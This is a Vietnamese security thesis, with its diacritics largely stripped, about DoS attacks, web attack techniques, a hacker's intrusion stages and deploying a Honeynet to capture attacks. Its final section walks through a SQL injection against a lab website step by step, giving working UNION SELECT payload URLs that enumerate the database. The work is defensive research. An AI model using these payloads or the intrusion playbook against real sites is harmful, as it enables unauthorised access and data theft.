n Tt Nghip ch khin cho my ch khng th p ng nhng yu cu chnh ng khc. Cc nguy c tn cng bng DOS * TN CNG TRN SWAP SPACE: Hu ht cc h thng u c vi trm MB khng gian chuyn i ( swap space) phc v cho nhng yu cu t my khch. Swap space thung dng cho cc tin trnh con c thi gian ngn nn DoS c th c da trn phng thc lm trn y swap space. * TN CNG TRN BANDWIDTH: Phn bng thng dnh cho mi h thng l gii hn, v th nu hacker cng lc gi nhiu yu cu n h thng th phn bng thng khng p ng cho mt khi lng d liu ln v dn n h thng b ph v. * TN CNG VO RAM: Tn cng Dos chim 1 khong ln ca RAM cng c th gy ra cc vn ph hy h thng. Kiu tn cng BufferOverflow l mt v d cho cch ph hy ny. * TN CNG VO DISKS: Mt kiu tn cng c in l lm y a cng. a cng c th b trn v khng th c s dng na. Mt s dn tn cng thng gp 1.1.1.16. Li dng TCP thc hin phng php SYN flood truyn thng

Hnh 3.1 - Tn cng DOS truyn thng Nh cp v vn thit lp kt ni trong phn 1, bt c 1 gi tin SYN, my ch cng phi 1 phn ti nguyn ca h thng nh b nh m nhn v truyn d liu cho ng truyn . Tuy nhin, ti nguyn ca h thng l c hn v hacker s tm mi cch h thng trn qua gii hn . (y cn c gi l half-open connection v my khch m kt ni gia chng). Theo hnh 1.13: Nu my ch sau khi gi tr mt gi
64 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip tin SYN/ACK thng bo chp nhn kt ni cho my yu cu nhng nu a ch IP ca my yu cu ny l gi mo th gi tin khng th n c ch, nn my ch vn phi dnh ti nguyn cho yu cu . Sau mt thi gian khng nhn c phn hi t my khch, my ch li tip tc gi mt gi tin SYN/ACK xc nhn ln na v c nh vy, kt ni vn tip tc m. Nu nh hacker gi nhiu gi tin SYN n my ch n khi my ch khng th tip nhn thm 1 kt ni no na th lc ny h thng b ph v. Tm li: Ch vi mt ng truyn bng thng nh, hacker c th ph v mt h thng. Thm vo , a ch IP ca hacker c th c sa i nn vic xc nh th phm l mt vn ht sc kh khn. 1.1.1.17. Tn cng vo bng thng - Kiu tn cng th 1: Hacker hon ton c kh nng lm ngp h thng v bng thng ca hacker ln hn bng thng ca my ch. Kiu tn cng ny khng b hn ch bi tc truyn mng. V d 9.III.3.1-1: Hacker c mt ng truyn tc cao T1 ( 1.544- Mbps ) hay ln hn c th d dng ph v mt h thng c ng truyn 56Kbps.
-

Kiu tn cng th 2:

Kiu tn cng ny c s dng khi ng truyn mng ca hacker l qu thp so vi ng truyn ca my ch. Khng ging nh kiu tn cng DoS truyn thng ( phn 2 ), kiu tn cng vo bng thng ln hn s li dng nhng gi tin t nhng h thng khc nhau cng mt lc tin n h thng ch khin cho ng truyn ca h thng ch khng cn kh nng p ng, my ch khng cn kh nng nhn mt gi tin no na.

65 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 3.2 Kiu tn cng DOS vo bng thng Theo hnh 3.2, tt c cc gi tin i vo 1 mng my tnh qua 1 "Big-Pipe"(ng dn ln ), sau c router chia ra nhng "Small Pipe" ( ng dn nh ) cho nhiu my tnh con ty theo a ch IP ca gi tin. Nhng nu ton b "Big-Pipe" b lm ngp bng nhng gi tin ch hng n 1 my nht nh trong mng my tnh con ny, router nh phi chp nhn loi b phn ln cc packet ch cn li s lng va i qua "Small Pipe" ca my tnh . Kiu tn cng ny s loi my ch ra khi Internet. y l phng php tn cng kiu t chi dch v nhng khng l DoS m gi l DDoS ( kiu t chi dch v phn tn ), ngha l cng mt lc nhiu my s c pht ng gi gi tin n my ch ( mc d ng truyn ca mi my khng cao nhng nhiu ng truyn li hp thnh mt ng dn Big Pipe), lm cho my ch khng cn kh nng tip nhn gi tin v b loi khi mng Internet, nh s minh ha sau:

66 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 3.3 - Tn cng DDOS DRDoS (Distributed Reflection Denial of Service) - Th h tip theo ca DDoS: y cng chnh l nguyn nhn khin cho trang grc.com b ph v. Hnh sau s minh ha kiu tn cng DRDoS ny.

67 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 3.4 - Tn cng kiu DRDoS Bng cch gi a ch IP ca my ch, hacker s cng lc gi nhiu gi tin n cc h thng my mnh trn mng, cc h thng ny khi nhn gi tin SYN gi ny, chp nhn kt ni v gi tr mt gi tin SYN/ACK thng bo. V a ch IP ca gi tin SYN b hacker sa i thnh a ch IP my ch nn nhng gi tin SYN/ACK s c gi v cho my ch. Cng mt lc nhn c nhiu gi tin, ng truyn ca my ch khng kh nng p ng, h thng my ch t chi nhn bt k gi tin no v lc ny h thng my ch b sp . Bin php phng chng Kiu tn cng t chi dch v l kiu tn cng gy nhiu kh khn trong vn bo v cng nh iu tra tm ra th phm nht, bi v hu ht hacker thay i a ch IP ca my mnh nn rt kh xc nh ai l th phm. phng chng kh nng khuych i ng truyn, cn: Hu kh nng broadcast ti router bin Tng kch thc hng i kt ni -> kt qu: c th phng trnh kh nng trn hng i qua nhiu kt ni, nhng cch ny s dng nhiu ti nguyn Gim thi gian thit lp kt ni Dng nhng phn mm pht hin v ph hy kiu tn cng DoS: Hu ht nhng h iu hnh hin nay u h tr kh nng pht hin v phng chng kiu tn cng lt SYN.
68 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Tuy nhin cng c nhng phn mm c c kh nng trnh kiu tn cng ny. V d nh vi Linux kernels 2.0.30 v v sau ci t mt ty chn gi l SYN Cookie, kernel c nhim v truy tm v lu vt nhng kh nng c th xy ra k thut SYN. Sau , kernel s s dng mt giao thc m ho nh SYN cookie cho php ngi dng hp l ca h thng tip tc kt ni n h thng. Vi WindowNT 4.0 tr v sau, s dng k thut backlog, mi khi hng i kt ni khng p ng, h thng t ng cung cp ti nguyn cho hng i, v th hng i s khng b ph v. ng dng ch cho php mi mt my con ch c thit lp s kt ni ti a theo qui nh trnh trng hp hacker gi cng lc nhiu yu cu gy tc nghn. Nhn xt: Kiu tn cng t chi dch v tuy ch khin cho h thng b ph v trong vi pht nhng hu qu th kh to ln (nh hng trn phm vi tin v uy tn). y l k thut thng c hacker s dng trong trng hp khng th chim quyn qun tr trn h thng hoc thng tin, hoc mun ph hy uy tn ca c quan .Thm vo vic gi mo a ch khin cho hacker cng d dng thc hin vic tn cng m khng s b pht hin. Thng thng k thut ny c thc hin km theo s h tr ca vi cng c nh ping of death, teardrop Cc k thut tn cng mi nht. Cc chuyn gia bo mt lit k 10 k thut hng u tn cng trn web v d bo cc giao dch ngn hng trc tuyn c nguy c b hacker thm nhp cao nht. Pht hin ca Dng Ngc Thi, chuyn gia bo mt ngi Vit Nam ng hng u. Hi ng cc chuyn gia bo mt xp hng nhng k thut tn cng trn web trong nm 2010 v cc chuyn gia cng lit k danh sch 10 k thut tn cng web hng u sau qu trnh nh gi v ghi nhn. Kiu tn cng padding oracle crypto K tn cng (hacker) s khai thc khung t chc (framework) ASP.Net, hacker c th chim trn quyn iu khin bt k trang web no s dng ASP.NET v thm ch nghim trng hn c th chim quyn iu khin hon ton cc my ch Windows cha cc trang web ny. ( Ngi pht hin: Dng Ngc Thi v Juliano Rizzo)
69 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Evercookie C th dng Javascript to ra cc cookie v giu cookie 8 ni khc nhau trong trnh duyt, gy kh khn trong vic mun xa sch chng. Thng qua Evercookie, hacker c th t nhp vo my tnh ngay c khi cookie b xa. (Ngi to ra: Samy Kamkar). Tn cng Autocomplete Tnh nng ny s t ng in vo mu (form) c sn trn trang web (tnh nng autocomplet t ng bt), lc trang web cha m c c th buc trnh duyt in y thng tin c nhn m d liu c ly t cc ngun khc nhau nm trn my tnh nn nhn. (Ngi to: Jeremiah Grossman). Tn cng HTTPS bng cache injection Tim m c vo th vin Javascript nm trong cache ca trnh duyt, do hacker c th ph trang web d c bo v bi SSL, v khin cache b xa sch. Gn mt na trong 1 triu trang web hng u s dng th vin m rng ca Javascript. (Ngi to: Elie Bursztein, Baptiste Gourdin v Dan Boneh). B qua bo v CSRF bng ClickJacking v HTTP Parameter Pollution Cch tn cng ny s la ngi dng ly mt khu truy cp vo e-mail. Nhng k tn cng c th to li mt khu mi ca nn nhn v truy cp trc tip vo ti khon ca nn nhn.( Ngi to: Lavakumar Kuppan ). Universal XSS trong IE8 L hng trong IE8 s gip hacker nh m c vo cc trang web v chim quyn kim sot my. (Ngi to: David Lindsay v Eduardo Vela). HTTP POST DoS y l k thut tn cng DDoS da trn mt l hng v kin trc ca phng thc POST trong HTTP nhm ko di thi gian kt ni lm cn kit ti nguyn my ch. Mt khi qu nhiu d liu c gi n my ch ng thi th lc my ch tr nn qu ti. (Ngi to: Wong Onn Chee v Tom Brennan).

70 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip JavaSnoop Khi d liu truyn n my ch, i km theo l cng c JavaSnoop kim tra xem cc ng dng trn my ch c bo m an ton hay khng. Hacker c th np bng di cng c ny khng. ( Ngi to: Arshan Dabirsiagh). Tn cng qua CSS History trong Firefox khng cn JavaScript cho PortScanning trong mng ni b Cch tn cng ny c th tc ot d liu trong history ca trnh duyt. Cc thng tin trong history c th gip hacker tn cng theo dng la o trang web (phishing). ( Ngi to: Robert RSnake Hansen ). Java Applet DNS Rebinding Hacker c th kim sot Java applet, khin trnh duyt pht l cache ca DNS, sau ngi dng c th sp by. Java applet thng l cc chng trnh nh chy bn trong trnh duyt Web (Ngi to: Stefano Di Paola). Tng kt chung qu trnh tn cng ca Hacker Qua phn trnh by mt s k thut tn cng ca Hacker, ta c th tng kt chung li qu trnh thc hin mt cuc tn cng ca Hacker vo dich v web nh sau: Bc 1: FootPrinting (thu thp thng tin): y l bc m hacker lm khi mun ly mt lng thng tin ti a v my ch/doanh nghip/ngi dng, bao gm chi tit v a ch IP, Whois, DNS..v.v - l nhng thng tin chnh thc c lin quan n mc tiu. Cng c h tr: UseNet , search engines (cng c tm kim) , Edgar Any Unix client, http://www.networksolutions.com/whois, nslookup Is -d , http://www.arin.net/whois, dig Bc 2: Scanning (Qut thm d): Phn ln thng tin quan trng t server c c t bc ny , bao gm qut cng, xc nh h iu hnh, .v.v.. bit cc port trn server, nghe ng d liu. Cc cng c: fping, icmpenum Ws_ping ProPack, nmap, SuperScan, fscan nmap, . Bc 3: Enumeration (lit k tm l hng): Bc th ba l tm kim nhng ti nguyn c bo v km, hoch ti khon ngi dng m c th s dng xm nhp,
71 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip bao gm cc mt khu mc nh, cc script v dch v mc nh. Rt nhiu ngi qun tr mng khng bit n hoc khng sa i li cc gi tr ny. Cc cng c ph tr: null sessions, DumpACL, sid2user, OnSite Admin showmount, NAT Legion banner grabbing vi telnet, netcat, rpcinfo. Bc 4: Gaining access (Tm cch xm nhp): By gi hacker s tm cch truy cp vo mng bng nhng thng tin c c ba bc trn. Phng php force (kim tra tt c cc trng hp) password. Cc cng c: tcpdump, L0phtcrack readsmb, NAT, legion, tftp, pwdump2 (NT) ttdb, bind, IIS, HTR/ISM.DLL Bc 5: Escalating privilege (Leo thang c quyn): Trong trng hp hacker xm nhp c vo mng vi mt ti khon no , th h s tm cch kim sot ton b h thng. Hacker s tm cch crack password ca admin, hoc s dng l hng leo thang c quyn. John v Riper l hai chng trnh crack password rt hay c s dng. Cng c: L0phtcrack, Ic_messages, getadmin, sechole. Bc 6: Pilfering (Dng khi cc file cha pass b s h): Thm mt ln na cc my tm kim li c s dng tm cc phng php truy cp vo mng. Nhng file text cha password hay cc c ch khng an ton khc c th l ch cho hacker. Thng tin ly t bc trn ta nh v server v iu khin server. Nu bc ny khng thnh cng, n bc <9>. Cng c h tr: rhost, LSA Secrets user data, configuration files, Registry. Bc 7: Covering Tracks (Xo du vt) : Sau khi c nhng thng tin cn thit, hacker tm cch xo du vt, xo cc file log ca h iu hnh lm cho ngi qun l khng nhn ra h thng b xm nhp hoc c bit cng khng tm ra k xm nhp l ai. Xa log. Cng c: Zap, Event log GUI, rootkits, file streaming. Bc 8: Creating Backdoors (To ca sau chun b cho ln xm nhp tip theo c d dng hn): Hacker li "Back Doors", tc l mt c ch cho php hacker truy nhp tr li bng con ng b mt khng phi tn nhiu cng sc, bng vic ci t Trojan hay to user mi (i vi t chc c nhiu user).
72 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

dng y c th l tn cng vo li trn b m, ly v gii m file password, hay brute

n Tt Nghip Cng c y l cc loi Trojan, keylog, creat rogue user accounts, schedule batch jobs, infect startup files, plant remote control services, install monitoring mechanisms, replace apps with Trojan. Cng c: members of wheel, administrators cron, At rc, Startup folder, registrykeys, netcat, remote.exe, VNC, BO2K, keystroke loggers,.. Tm li, vic thu thp thng tin l v cng quan trng cho vic tn cng vo mt h thng my ch. Cho d hacker tn cng theo phng din phn cng hay qua ng dng th vic thu thp vn l cn thit. Vn l vic thc hin s theo tng bc nh th no. C th trong nhng bc nu hacker khng cn phi i qua theo th t hay qua ht, nhng vic nm r thng tin ca my ch lun l iu kin tin quyt dn n thnh cng trong vic tn cng. Ty vo ni dung thng tin hacker thu thp c m hacker s quyt nh tn cng theo k thut no. Do , vic bo mt cho mt h thng cn i hi s kt hp khng ch ca ring nh qun tr h thng m cn ca nh thit k ng dng v s hp tc ca c nhng khch hng s dng ng dng web. Kt lun: Do thi gian thc hin n c hn, v vy chng ny ch trnh by mt s K thut tn cng c xem l hay gp v c mc nguy him cao. Trong cc k thut tn cng trnh by trn th tn cng SQL-injection l thng gp hn c, v vy k thut SQL-injection s c chn l k thut tn cng trong Kch bn tn h thng Honeynet c trnh by chng sau.

73 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Chng IV -TRIN KHAI- CI T- VN HNH H THNG HONEYNET Trong cc chng trc gii thiu cho chng ta v mc ch trin khai - xy dng h thng Honeynet, trnh by m hnh kin trc, nguyn l hot ng , cng vi vai tr ngha ca Honeynet. Chng ta cng c bit mt s K thut tn cng dch v Web c mc nguy him v hay gp chng trc. Sang chng ny, n tip tc trnh by v vic ng dng trin khai, ci t v vn hnh h thng Honeynet. Chng ny bao gm: M hnh trin khai thc t Ci t v cu hnh h thng Honeynet Vn hnh h thng Honeynet v phn tch k thut tn cng ca Hacker 1. M hnh trin khai thc t Do iu kin khch quan khng c a ch IP tnh, nhm ti trin khai h thng Honeynet m phng li mt s kiu tn cng m hacker thc hin trn cc h thng trn th gii.

Hnh 4.1 - M hnh trin khai thc t

74 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Bng di y a cu hnh ca cc thnh phn trong Honeynet: Thnh phn Honeypots( PC Desktop) H iu hnh Web server( Window xp ) Ghi ch Web server: IIS+ SQL server Server (Honeynet gateway) Management( PC Desktop) Hacker( PC desktop) roo-1.4.hw-2009 Window xp Window xp Ci t Sebek Client Yu cu c 3 card mng

2. Ci t v cu hnh h thng Honeynet 2.1. Ci t v cu hnh Honeywall a) Ci t Qu trnh thc hin Honeywall kh n gin, sau khi a a ci t Honeywall Roo vo, mn hnh sau xut hin:

Hnh 4.2 - Mn hnh ci t Honeywall Sau thc hin theo hng dn, qu trnh ci t s din ra t ng. Lu : sau khi ci t, d liu trn cng s b xa ht, bi vy cn phi sao lu trc khi ci t b) Cu hnh
75 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Sau khi Honeywall c ci t, nhim v u tin l cu hnh h thng. Trn thc t, Honeywall l mt gateway - ni lung d liu vo / ra h thng Honeynet phi i qua, hot ng ch cu (bridge) s dng iptable, snort_inline kim sot d liu. Ngoi ra, Honeywall s dng snort, pcap_api thu nhn d liu trn mng. Honeywall bn roo 1.4-hw-2009 tch hp Sebekd 3.0.5 thu nhn d liu Sebek t pha Sebek client gi v, cng vi cng c h tr phn tch Walleye, giao din ha da trn nn Web. Sau khi ci t xong th Honeywall s t ng Restart li v sau hin ra mn hnh Login nh hnh di . Theo mc nh , Honeywall c sn 2 Account l : Roo v Root ; c 2 u c password l : honeynet . V m bo tnh an ton ,Honeywall ch cho php Logon vi Account Roo , sau s su ln vi quyn ca Account Root bng lnh : su Honeywall cung cp mt giao din kiu hi thoi cu hnh tp /etc/Honeywall.conf

Hnh 4.3 - Mn hnh cu hnh Honeywall Di y l cc tham s quan trng cha trong tp /etc/Honeywall.conf # Specify the system hostname # [Valid argument: string ] HwHOSTNAME=roo-test # Specify the system DNS domain # [Valid argument: string ]
76 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip HwDOMAIN=localdomain #Start the Honeywall on boot # [Valid argument: yes | no] HwHONEYWALL_RUN=no # To use a headless system. # [Valid argument: yes | no] HwHEADLESS=no # This Honeywall's public IP address(es) # [Valid argument: IP address | space delimited IP addresses] HwHPOT_PUBLIC_IP=10.0.0.20 # DNS servers honeypots are allowed to communicate with # [Valid argument: IP address | space delimited IP addresses] HwDNS_SVRS= # To restrict DNS access to a specific honeypot or group of honeypots, list # them here, otherwise leave this variable blank # [Valid argument: IP address | space delimited IP addresses | blank] HwDNS_HOST= # The name of the externally facing network interface # [Valid argument: eth* | br* | ppp*] HwINET_IFACE=eth0 # The name of the internally facing network interface # [Valid argument: eth* | br* | ppp*] HwLAN_IFACE=eth1
77 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip # The IP internal connected to the internally facing interface # [Valid argument: IP network in CIDR notation] HwLAN_IP_RANGE=10.0.0.0/24 # The IP broadcast address for internal network # [Valid argument: IP broadcast address] HwLAN_BCAST_ADDRESS=10.0.0.255 # Enable QUEUE support to integrate with Snort-Inline filtering # [Valid argument: yes | no] HwQUEUE=yes # The unit of measure for setting oubtbound connection limits # [Valid argument: second, minute, hour, day, week, month, year] HwSCALE=hour # The number of TCP connections per unit of measure (HwScale) # [Valid argument: integer] HwTCPRATE=20 # The number of UDP connections per unit of measure (HwSCALE) # [Valid argument: integer] HwUDPRATE=20 # The number of ICMP connections per unit of measure (HwSCALE) # [Valid argument: integer] HwICMPRATE=50 # The number of other IP connections per unit of measure (HwSCALE)
78 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip # [Valid argument: integer] HwOTHERRATE=10 # Enable the SEBEK collector which delivers keystroke and files # to a remote system even if an attacker replaces daemons such as sshd # [Valid argument: yes | no] HwSEBEK=no # Enable the Walleye Web interface. #[Valid argument: yes | no] HwWALLEYE=yes # Specify whether whether to drop SEBEK packets or allow them to be sent # outside of the Honeynet. # [Valid argument: ACCEPT | DROP] HwSEBEK_FATE=DROP # Specify the SEBEK destination host IP address # [Valid argument: IP address] HwSEBEK_DST_IP=10.0.0.253 # Specify the SEBEK destination port # [Valid argument: port] HwSEBEK_DST_PORT=1101 # Enable SEBEK logging in the Honeywall firewall logs # [Valid argument: yes | no] HwSEBEK_LOG=no

79 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip # Specify whether the dialog menu is to be started on login to TTY1 # [Valid argument: yes | no ] HwMANAGE_DIALOG=yes # Specify whether management port is to be activated on start or not. # [Valid argument: yes | no ] HwMANAGE_STARTUP=yes # Specy the network interface for remote management. If set to br0, it will # assign MANAGE_IP to the logical bridge interface and allow its use as a # management interface. Set to none to disable the management interface. # [Valid argument: eth* | br* | ppp* | none] HwMANAGE_IFACE=eth2 # IP of management Interface # [Valid argument: IP address] HwMANAGE_IP=10.10.10.66 # Netmask of management Interface # [Valid argument: IP netmask] HwMANAGE_NETMASK=255.255.255.0 # Default Gateway of management Interface # [Valid argument: IP address] HwMANAGE_GATEWAY=10.10.10.1 # DNS Servers of management Interface # [Valid argument: space delimited IP addresses] HwMANAGE_DNS=
80 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip # TCP ports allowed into the management interface. # Do NOT include the SSHD port. It will automatically be included # [Valid argument: space delimited list of TCP ports] HwALLOWED_TCP_IN=443 # Specify whether or not the Honeywall will restrict outbound network # connections to specific destination ports. When bridge mode is utilized, # a management interface is required to restrict outbound network connections. # [Valid argument: yes | no] HwRESTRICT=yes # Specity the TCP destination ports Honeypots can send network traffic to. # [Valid argument: space delimited list of UDP ports] HwALLOWED_TCP_OUT=22 25 43 80 443 # Specity the UDP destination ports Honeypots can send network traffic to. # [Valid argument: space delimited list of UDP ports] HwALLOWED_UDP_OUT=53 123 # Specify whether or not to start swatch and email alerting. # [Valid argument: yes | no] HwALERT=no # Specify email address to use for email alerting. # [Valid argument: any email address] HwALERT_EMAIL=root@localhost.localdomain # NIC Module List - Set this to the number and order you wish # to load NIC drivers, such that you get the order you want # for eth0, eth1, eth2, etc.
81 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip # [Valid argument: list of strings] # # Example: eepro100 8139too HwNICMODLIST= # Blacklist, Whitelist, and Fencelist features. # [Valid argument: string ] HwFWBLACK=/etc/blacklist.txt # [Valid argument: string ] HwFWWHITE=/etc/whitelist.txt # [Valid argument: string ] HwFWFENCE=/etc/fencelist.txt # [Valid argument: yes | no] HwBWLIST_ENABLE=no # [Valid argument: yes | no] HwFENCELIST_ENABLE=no # The following feature allows the roo to allow attackers into the # honeypots but they can't send packets out... # [Valid argument: yes | no] HwROACHMOTEL_ENABLE=no # Disables BPF filtering based on the contents of HwHPOT_PUBLIC_IP # and the black and white list contained within HwFWBLACK and HwFWWHITE # if the HwBWLIST_ENABLE is on. Other wise, it just filters based on # the contents of HwHPOT_PUBLIC_IP
82 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip # [Valid argument: yes | no] HwBPF_DISABLE=no # This capability is not yet implemented in roo. The variable # has been commented out for this reason. dittrich - 02/08/05 # Options for hard drive tuning (if needed). # [Valid argument: string ] # Example: -c 1 -m 16 -d HwHWPARMOPTS= # Should we swap capslock and control keys? HwSWAP_CAPSLOCK_CONTROL=no Cc tham s quan trng ca Honeywall trn c minh ha qua cc hnh sau :

Hnh 4.4 - Cu hnh cc a ch IP Public cho cc Honeypots

Hnh 4.5 Cu hnh a ch IP ch cho cc gi tin Sebek


83 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.6 Hnh cu hnh la chn Honeywall x l cc gi tin Sebek

Hnh 4.7 - Cu hnh a ch IP cho Management Interface ( eth2 )

Hnh 4.8 - Cu hnh default gateway cho Managemant Interface

84 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.9 - Sau khi cu hnh xong th Honeywall Resart cc dch v Ton b ni dung tp cu hnh Honeywall.conf c th tham kho ti phn ph lc. Sau khi cu hnh xong trn Honeywall, chng ta c th qun l Honeywall thng qua giao din Web ti a ch: https://10.0.0.66 (nh hnh minh ha di y)

Hnh 4.10 - Giao din qun l Honeywall

85 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip 2.2 Ci t v cu hnh Sebek a) Ci t Chng ta thc hin ci t Sebek client trn cc honeypot nhm thc hin thu nhn cc hnh ng ca hacker trn tng honeypot. Ci t Sebek client trn h iu hnh WINDOWS
-

Ti tp tin Sebek Win32 3.0.5.zip Gii nn tp tin v chy tp ci t Setup.exe Sau khi ci t xong, thc hin cu hnh thng qua chng trnh Configuration Ci t Sebek client trn h iu hnh LINUX RED HAT 9.0 Ti tp tin sebek linux 3.0.5.tar.gz Thc hin qu trnh ci t tar xzf sebek-linux-3.0.5.tar.gz cd sebek-linux-3.0.5 ./configure make make install

Winzard.exe (cc tham s c cp phn cu hnh) -

ci t

Qu trnh ci t to ra tp sebek linux 3.0.3 bin.tar, thc hin tip vic Tar xf sebek-linux-3.0.5-bin.tar Cd sebek-linux-3.0.5-bin

Kt thc qu trnh ci t, thc hin shell sbk_install.sh ./sbk_install.sh

Ch : Trc khi thc hin shell sbk_install.sh chng ta phi thc hin sa i ni dung ca tp ny theo cc tham s ci t cho Sebek client (trnh by phn tip theo) b) Cu hnh Di y l mt s tham s c bn s dng cu hnh cho Sebek client * Cu hnh trn Linux : #----- DESTINATION_IP:
86 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip #----#----- sets destination IP for sebek packets #----DESTINATION_IP="192.168.1.253" a ch ny phi trng vi a ch IP khai bo mc Sebek khi cu hnh Honeywall #----- DESTINATION_MAC: #----#----- sets destination MAC addr for sebek packets #----DESTINATION_MAC="00:20:ED:00:00:00" y l a ch MAC ca card Internal(eth1)trn Honeywall . #----- DESTINATION_PORT: #----#----- defines the destination udp port sebek sends to #----DESTINATION_PORT=1101 * Cu hnh trn Windows :

Hnh 4.11 - Cu hnh Sebek Client trn Windows

87 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

3. Vn hnh h thng Honeynet v phn tch k thut tn cng ca Hacker Kch bn tn cng

Hnh 4.12 - Kch bn tn cng h thng Honeynet n s trnh by mt kch bn tn cng website mc li SQL-injection (l k thut tn cng ph bin v c mc nguy him cao) da trn m hnh trin khai h thng Honeynet din ra nh sau:
-

Hacker sau khi thc hin d qut trn mng, pht hin ra Web Server (a ch IP 192.168.1.111) ca h thng b li SQL-injection, hacker thc hin khai thc l hng ny v tim cc on m SQL c hi (malicious code) nhm khai thc chim quyn iu khin ton b Website .

Sau khi ginh quyn iu khin Website, hacker ci t backdoor trn Web Server d dng truy cp, kim sot Web server. Tip theo, hacker thc hin thay i ni dung trang Web, a nhng thng tin hnh nh mang tnh cht ph hoi ln. V ci t m c ln website nhm pht tn cc m c trn mng .
88

Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Ton b thng tin qu trnh tn cng ca hacker vo h thng Honeynet s c ghi li y , chi tit. Nhng thng tin h thng Honeynet thu thp s c ngi phn tch thc hin phn tch, nh gi di s tr gip ca cng c qun l v h tr phn tch Walleye trong Honeynet nhm a ra: - Qu trnh tn cng din ra nh th no (chi tit tng bc) - Cng c hacker s dng (cng c khai thc Metasploit, Retina Network Security Scanner ; cng c d qut li SQL-injection Scrawlr 1.0 , ...) - K thut hacker s dng Qu trnh phn tch s c trnh by c th trong phn tip theo. Phn tch k thut tn cng ca hacker Qu trnh hacker thc hin tn cng Website Di y l hnh nh ca website bo in t v oto c a ch l http://192.168.1.111/genu, b mc li SQL-injection m chng ta s tin hnh thc hin khai thc tn cng:

Hnh 4.13 Giao din ca website s b tn cng Trc khi i vo qu trnh thc hin tn cng, chng ta cn phi bit trong C s d liu SQL c: 2 i tng l sysobjects v syscolumns cho php lit k tt c cc tn bng v ct c trong h thng v bng h thng INFORMATION_SCHEMA.TABLES cha thng tin v tt c cc table c trn server. V vy, chng ta s s dng thng tin ny

89 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip thc hin khai thc, tn cng vo website nhm chim c quyn qun tr (admin) ca Website ny. Hacker pht hin ra website b li SQL Injection khi thm du sau ng dn http://192.168.1.111/genu/articles/read.php?article_id=1 v website thng bo li nh sau: Error in query "SELECT genu_articles.article_date, genu_articles.article_subject, genu_articles.article_text, genu_articles.article_id = 1\'". Di y l ton b qu trnh thc hin tn cng khai thc li SQL- injection : Bc 1: Khai thc tn c s d liu Sau khi bit Website b li SQL Injection, ta tip tc khai thc tn c s d liu. Bng cch chng ta truy vn vi gi tr null c ngha rng khng c mt gi tr xc thc ng thi chng ta s s dng cu truy vn vi union. Lnh union y chnh l lnh kt ni cc bng li vi nhau.Chng ta c s dng cho n khi bit chnh xc c bao nhiu bng d liu nm trong database. http://192.168.1.111/genu/articles/read.php?article_id=null information_schema.tables-Hacker s nhn thng bo li sau: union select 1 from genu_users.user_id, genu_users.user_name FROM genu_articles, genu_users WHERE genu_articles.user_id = genu_users.user_id AND

Hnh 4.14 Thng bo li l website b mc li SQL-injection

90 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Lu : S ct trong hai cu SELECT phi khp vi nhau. Ngha l s lng ct trong cu lnh SELECT ban u v cu lnh UNION SELECT pha sau bng nhau v cng kiu.V y, ta khng bit s lng cc ct ca Bng cu lnh SELECT ban u nn ta buc phi tm bng cch ln lt tng thm cc s '2,3,4,5' vo Cu lnh UNION SELECT. V cui cng l: http://192.168.1.111/genu/articles/read.php?article_id=null union select 1,2,3,4,5 from information_schema.tables-Hacker s nhn c thng bo:

Hnh 4.15 Thng bo v tr ct c th chn cu lnh SQL Nh ta thy ct 2,3,5 c th tim cu lnh SQL. Vy ta thm database() bit tn c s d liu m Website ang s dng. http://192.168.1.111/genu/articles/read.php?article_id=null union select 1,database(),3,4,5 from information_schema.tables-Hacker s nhn c thng tin l tn ca c s d liu:

91 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.16 Tn c s d liu cn tm Bc 2: Khai thc s table c trong c s d liu genu Tip tc khai thc l hng v tr th 2 nh bc u tin. Ta tip tc lit k cc bng c trong c s d liu bng cch tim group_concat(table_name), v n s tr v mt chui cc kt qu. C th: http://192.168.1.111/genu/articles/read.php?article_id=null 1,group_concat(table_name),3,4,5 from table_schema=CHAR(103,101,110,117)-Lu : CHAR(103,101,110,117) c chuyn i t tn c s d liu genu cu truy vn sql tr nn ng. Nu gi nguyn l genu th trnh duyt n lun lun lc du ra khi url nn cu truy vn sai. y ta dung tool hackbar chuyn i t string qua kiu char. Hacker s nhn c thng bo v cc table c trong c s d liu genu union select where information_schema.tables

92 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

